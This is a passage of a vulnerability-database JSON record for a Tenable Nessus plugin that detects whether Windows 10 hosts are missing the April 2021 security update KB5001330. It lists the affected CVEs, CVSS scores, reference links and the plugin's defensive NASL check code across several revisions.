["SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001339.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-28314", "CVE-2021-28441", "CVE-2021-27086", "CVE-2021-28324", "CVE-2021-27090", "CVE-2021-28442", "CVE-2021-27088", "CVE-2021-27092", "CVE-2021-28438", "CVE-2021-28436"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-28325/", "MSF:ILITIES/MSFT-CVE-2021-28319/", "MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-28311/", "MSF:ILITIES/MSFT-CVE-2021-26415/", "MSF:ILITIES/MSFT-CVE-2021-28318/", "MSF:ILITIES/MSFT-CVE-2021-28440/", "MSF:ILITIES/MSFT-CVE-2021-26413/"]}, {"type": "mskb", "idList": ["KB5001330"]}], "modified": "2021-07-29T03:55:02", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-07-29T03:55:02", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/27\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T03:55:02", "differentElements": ["cpe", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitAvailable", "exploitEase", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 5}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "8fe2bb23fd6f86369b812d04df5a5650", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-07-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28336", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28327", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27088", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28355", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28348", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28442", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28337", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28342", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28326", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28349", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28443", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27089", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28332", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28440", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28316", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28353", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28436", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28328", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27096", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28351", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28321", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28313", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27079", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28447", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28312", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28319", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28344", "https://support.microsoft.com/en-us/help/5001330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28347", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28315", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27072", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28438", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28446", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28356", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28434", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28338", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28445", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28439", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27094", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26413", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28311", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27093", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28335", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28334", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28350", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28341", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28441", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26416", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28343", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28358", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27095", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28314", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28437", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28345", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26415", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28310", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26417", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28435", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28331", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28354", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28357", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324"], "cvelist": ["CVE-2021-26413", "CVE-2021-26415", "CVE-2021-26416", "CVE-2021-26417", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27086", "CVE-2021-27088", "CVE-2021-27089", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-27095", "CVE-2021-27096", "CVE-2021-28309", "CVE-2021-28310", "CVE-2021-28311", "CVE-2021-28312", "CVE-2021-28313", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28316", "CVE-2021-28317", "CVE-2021-28318", "CVE-2021-28319", "CVE-2021-28320", "CVE-2021-28321", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28324", "CVE-2021-28325", "CVE-2021-28326", "CVE-2021-28327", "CVE-2021-28328", "CVE-2021-28329", "CVE-2021-28330", "CVE-2021-28331", "CVE-2021-28332", "CVE-2021-28333", "CVE-2021-28334", "CVE-2021-28335", "CVE-2021-28336", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28339", "CVE-2021-28340", "CVE-2021-28341", "CVE-2021-28342", "CVE-2021-28343", "CVE-2021-28344", "CVE-2021-28345", "CVE-2021-28346", "CVE-2021-28347", "CVE-2021-28348", "CVE-2021-28349", "CVE-2021-28350", "CVE-2021-28351", "CVE-2021-28352", "CVE-2021-28353", "CVE-2021-28354", "CVE-2021-28355", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28358", "CVE-2021-28434", "CVE-2021-28435", "CVE-2021-28436", "CVE-2021-28437", "CVE-2021-28438", "CVE-2021-28439", "CVE-2021-28440", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-28443", "CVE-2021-28444", "CVE-2021-28445", "CVE-2021-28446", "CVE-2021-28447"], "immutableFields": [], "lastseen": "2021-08-05T12:47:47", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001340.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-28441", "CVE-2021-27086", "CVE-2021-28438", "CVE-2021-27090", "CVE-2021-28436", "CVE-2021-28312", "CVE-2021-28324", "CVE-2021-28314", "CVE-2021-28442", "CVE-2021-27092"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-28325/", "MSF:ILITIES/MSFT-CVE-2021-28440/", "MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-28319/", "MSF:ILITIES/MSFT-CVE-2021-28318/", "MSF:ILITIES/MSFT-CVE-2021-26413/", "MSF:ILITIES/MSFT-CVE-2021-26415/", "MSF:ILITIES/MSFT-CVE-2021-28311/"]}, {"type": "mskb", "idList": ["KB5001330"]}], "modified": "2021-08-05T12:47:47", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-05T12:47:47", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/27\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": [], "solution": "Microsoft has released KB5001330 to address this issue.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-27092", "vpr": {"risk factor": "Critical", "score": "9.5"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-05T12:47:47", "differentElements": ["cpe"], "edition": 6}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "0960a91bdb0da7ebf0b679990f17ded5", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-07-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26416", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28345", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28353", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28311", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28443", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27093", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28441", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28348", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28356", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28351", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28338", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28347", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28342", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27079", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28442", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27088", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28331", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26413", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28437", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27095", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28316", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28350", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28445", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28434", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28326", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28349", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28435", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28447", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28358", 